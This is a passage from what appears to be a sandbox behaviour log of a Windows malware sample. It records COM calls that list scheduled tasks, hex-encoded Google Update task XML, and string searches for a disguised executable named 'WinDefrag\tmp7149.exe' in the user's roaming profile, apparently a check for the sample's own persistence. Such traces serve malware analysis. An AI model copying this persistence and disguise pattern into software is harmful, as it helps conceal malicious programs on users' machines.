\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0257.565] StrStrIW (lpFirst="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x74\x72\x75\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x4c\x6f\x67\x6f\x6e\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x38\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x63\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\WinDefrag\\tmp7149.exe") returned 0x0 [0257.603] IUnknown:Release (This=0x4567b0) returned 0x0 [0257.603] IRegisteredTaskCollection:get_Item (in: This=0x456710, index=0x1ee000*(varType=0x3, wReserved1=0x2b, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x1), ppRegisteredTask=0x1edfc8 | out: ppRegisteredTask=0x1edfc8*=0x4567b0) returned 0x0 [0257.603] IRegisteredTask:get_Name (in: This=0x4567b0, pName=0x1edfc0 | out: pName=0x1edfc0*="GoogleUpdateTaskMachineUA") returned 0x0 [0257.603] IRegisteredTask:get_Xml (in: This=0x4567b0, pXml=0x1edfb0 | out: pXml=0x1edfb0*="\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x31\x36\x22\x3f\x3e\x0d\x0a\x3c\x54\x61\x73\x6b\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x32\x22\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x73\x63\x68\x65\x6d\x61\x73\x2e\x6d\x69\x63\x72\x6f\x73\x6f\x66\x74\x2e\x63\x6f\x6d\x2f\x77\x69\x6e\x64\x6f\x77\x73\x2f\x32\x30\x30\x34\x2f\x30\x32\x2f\x6d\x69\x74\x2f\x74\x61\x73\x6b\x22\x3e\x0d\x0a\x20\x20\x3c\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x56\x65\x72\x73\x69\x6f\x6e\x3e\x31\x2e\x33\x2e\x33\x33\x2e\x35\x3c\x2f\x56\x65\x72\x73\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x48\xe4\x6c\x74\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x61\x75\x66\x20\x64\x65\x6d\x20\x6e\x65\x75\x65\x73\x74\x65\x6e\x20\x53\x74\x61\x6e\x64\x2e\x20\x46\x61\x6c\x6c\x73\x20\x64\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x61\x6b\x74\x69\x76\x69\x65\x72\x74\x20\x6f\x64\x65\x72\x20\x61\x6e\x67\x65\x68\x61\x6c\x74\x65\x6e\x20\x77\x69\x72\x64\x2c\x20\x77\x69\x72\x64\x20\x49\x68\x72\x65\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x6b\x74\x75\x61\x6c\x69\x73\x69\x65\x72\x74\x2e\x20\x44\x61\x73\x20\x68\x65\x69\xdf\x74\x2c\x20\x64\x61\x73\x73\x20\x65\x76\x65\x6e\x74\x75\x65\x6c\x6c\x20\x61\x75\x66\x74\x72\x65\x74\x65\x6e\x64\x65\x20\x53\x69\x63\x68\x65\x72\x68\x65\x69\x74\x73\x6c\xfc\x63\x6b\x65\x6e\x20\x6e\x69\x63\x68\x74\x20\x62\x65\x68\x6f\x62\x65\x6e\x20\x75\x6e\x64\x20\x62\x65\x73\x74\x69\x6d\x6d\x74\x65\x20\x46\x75\x6e\x6b\x74\x69\x6f\x6e\x65\x6e\x20\x6d\xf6\x67\x6c\x69\x63\x68\x65\x72\x77\x65\x69\x73\x65\x20\x6e\x69\x63\x68\x74\x20\x61\x75\x73\x67\x65\x66\xfc\x68\x72\x74\x20\x77\x65\x72\x64\x65\x6e\x20\x6b\xf6\x6e\x6e\x65\x6e\x2e\x20\x44\x69\x65\x73\x65\x20\x41\x6e\x77\x65\x6e\x64\x75\x6e\x67\x20\x64\x65\x69\x6e\x73\x74\x61\x6c\x6c\x69\x65\x72\x74\x20\x73\x69\x63\x68\x20\x73\x65\x6c\x62\x73\x74\x2c\x20\x77\x65\x6e\x6e\x20\x73\x69\x65\x20\x6e\x69\x63\x68\x74\x20\x76\x6f\x6e\x20\x65\x69\x6e\x65\x72\x20\x47\x6f\x6f\x67\x6c\x65\x2d\x53\x6f\x66\x74\x77\x61\x72\x65\x20\x76\x65\x72\x77\x65\x6e\x64\x65\x74\x20\x77\x69\x72\x64\x2e\x3c\x2f\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x3c\x2f\x52\x65\x67\x69\x73\x74\x72\x61\x74\x69\x6f\x6e\x49\x6e\x66\x6f\x3e\x0d\x0a\x20\x20\x3c\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x32\x30\x31\x37\x2d\x30\x36\x2d\x33\x30\x54\x31\x30\x3a\x33\x36\x3a\x30\x39\x3c\x2f\x53\x74\x61\x72\x74\x42\x6f\x75\x6e\x64\x61\x72\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x50\x54\x31\x48\x3c\x2f\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x50\x31\x44\x3c\x2f\x44\x75\x72\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x3c\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x31\x3c\x2f\x44\x61\x79\x73\x49\x6e\x74\x65\x72\x76\x61\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x42\x79\x44\x61\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x43\x61\x6c\x65\x6e\x64\x61\x72\x54\x72\x69\x67\x67\x65\x72\x3e\x0d\x0a\x20\x20\x3c\x2f\x54\x72\x69\x67\x67\x65\x72\x73\x3e\x0d\x0a\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x20\x69\x64\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x55\x73\x65\x72\x49\x64\x3e\x53\x2d\x31\x2d\x35\x2d\x31\x38\x3c\x2f\x55\x73\x65\x72\x49\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x48\x69\x67\x68\x65\x73\x74\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3c\x2f\x52\x75\x6e\x4c\x65\x76\x65\x6c\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x3e\x0d\x0a\x20\x20\x3c\x2f\x50\x72\x69\x6e\x63\x69\x70\x61\x6c\x73\x3e\x0d\x0a\x20\x20\x3c\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x49\x67\x6e\x6f\x72\x65\x4e\x65\x77\x3c\x2f\x4d\x75\x6c\x74\x69\x70\x6c\x65\x49\x6e\x73\x74\x61\x6e\x63\x65\x73\x50\x6f\x6c\x69\x63\x79\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x44\x69\x73\x61\x6c\x6c\x6f\x77\x53\x74\x61\x72\x74\x49\x66\x4f\x6e\x42\x61\x74\x74\x65\x72\x69\x65\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x74\x72\x75\x65\x3c\x2f\x53\x74\x61\x72\x74\x57\x68\x65\x6e\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x4e\x65\x74\x77\x6f\x72\x6b\x41\x76\x61\x69\x6c\x61\x62\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x6e\x61\x62\x6c\x65\x64\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x45\x6e\x61\x62\x6c\x65\x64\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x52\x75\x6e\x4f\x6e\x6c\x79\x49\x66\x49\x64\x6c\x65\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x66\x61\x6c\x73\x65\x3c\x2f\x57\x61\x6b\x65\x54\x6f\x52\x75\x6e\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x50\x54\x37\x32\x48\x3c\x2f\x45\x78\x65\x63\x75\x74\x69\x6f\x6e\x54\x69\x6d\x65\x4c\x69\x6d\x69\x74\x3e\x0d\x0a\x20\x20\x3c\x2f\x53\x65\x74\x74\x69\x6e\x67\x73\x3e\x0d\x0a\x20\x20\x3c\x41\x63\x74\x69\x6f\x6e\x73\x20\x43\x6f\x6e\x74\x65\x78\x74\x3d\x22\x41\x75\x74\x68\x6f\x72\x22\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x43\x3a\x5c\x50\x72\x6f\x67\x72\x61\x6d\x20\x46\x69\x6c\x65\x73\x20\x28\x78\x38\x36\x29\x5c\x47\x6f\x6f\x67\x6c\x65\x5c\x55\x70\x64\x61\x74\x65\x5c\x47\x6f\x6f\x67\x6c\x65\x55\x70\x64\x61\x74\x65\x2e\x65\x78\x65\x3c\x2f\x43\x6f\x6d\x6d\x61\x6e\x64\x3e\x0d\x0a\x20\x20\x20\x20\x20\x20\x3c\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x2f\x75\x61\x20\x2f\x69\x6e\x73\x74\x61\x6c\x6c\x73\x6f\x75\x72\x63\x65\x20\x73\x63\x68\x65\x64\x75\x6c\x65\x72\x3c\x2f\x41\x72\x67\x75\x6d\x65\x6e\x74\x73\x3e\x0d\x0a\x20\x20\x20\x20\x3c\x2f\x45\x78\x65\x63\x3e\x0d\x0a\x20\x20\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x61\x73\x6b\x3e") returned 0x0 [0257.605] StrStrIW 